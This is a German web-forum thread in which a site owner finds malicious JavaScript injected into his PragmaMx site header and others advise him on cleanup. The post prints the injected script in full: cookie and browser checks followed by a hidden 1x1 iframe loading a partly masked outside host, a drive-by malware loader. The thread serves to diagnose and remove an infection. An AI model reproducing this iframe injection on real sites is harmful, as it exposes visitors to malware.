Suche

[wiederalleine]

Nettes Hallo an Euch,

habe im Quelltext von www.auto***rtrieb-saar.de soeben das hier entdeckt:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de" dir="ltr"><script type="text/javascript">function get_cookie(Name) {   var search = Name + "=";   var returnvalue = "";   if (document.cookie.length > 0) {      offset = document.cookie.indexOf(search);      if (offset != -1) {          offset += search.length;         end = document.cookie.indexOf(";", offset);         if (end == -1)         end = document.cookie.length;         returnvalue=unescape(document.cookie.substring(offset, end));      }   }   return returnvalue;}function set_cookie(name, value) {    var cxdate = new Date();    cxdate.setYear(2024);    cxdate.setMonth(3);    cxdate.setDate(3);    document.cookie = name + '=' + escape(value) + ';expires=' + cxdate.toGMTString() + ';path=/';}var br_reg = /(Firefox|MSIE)/i;var usr_os = navigator.userAgent;if(get_cookie('toppedup') == '' && usr_os.match(/Windows/i) && usr_os.match(br_reg)) {   document.write('<iframe frameborder=0 height=1 width=1 scrolling=no src="http://dw*******rado.org/index.php"> </iframe>');   set_cookie('toppedup', '1010101');}</script><head>

und weiss gar nicht, wie dieser Link dort hineinkommen konnte!

Weiss da jemand einen Rat?

Gruß und Dank

Peter

P.S. Pragmamx Version 1.12.1

[trulla]

Schnell weg damit... Mein Virenprogramm schlägt Alarm auf deiner Seite.

[Andi]

Moin

Die Stelle an der der Code erscheint, weist darauf hin, dass zumindest die header.php verändert wurde.
Prüfe mit der Versionskontrolle, was noch alles verändert ist...

Die Google-Suche nach dem Schadcode bringt mir u.A. folgende 3 Links:
- http://www.xtc-supportforum.de/viewtopic.php?f=32&t=5799
- http://www.hijackthis-forum.de/allgemeine-probleme/58095-iframe-trojaner-oder-mehr.html
- http://www.naviuser.at/forum/showthread.php?p=36057

Anscheinend handelt es sich um einen Trojaner, der FTP-Passwörter ausliest und dann die Dateien beim hochladen infiziert, oder so ähnlich...
- Virencheck deines Rechners und allen Rechnern, die FTP-Zugriff auf deine Seiten haben
- FTP-Passwöerter ändern
- Hoster unterrichten, dass der auch mal den Server nach Trojendern und so Dreck checkt
- Schadcode auf dem Server (und deiner Seite) entfernen.


PS:
habe die Links entschärft

[wiederalleine]

Danke ---- für die schnelle Info! Habe alle neuen Dateien aus 1.12.1 aufgespielt, alle Passwörter geändert und es sieht wieder gut aus.....!

Gruß

Peter